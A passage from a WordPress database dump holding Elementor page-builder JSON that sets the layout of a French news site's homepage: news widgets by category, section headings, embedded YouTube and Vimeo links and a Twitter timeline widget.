\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"2\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3056,918,'_elementor_version','0.4'),(3057,918,'_elementor_css','a:3:{s:4:\"time\";i:1511196276;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3059,919,'_elementor_edit_mode','builder'),(3060,919,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\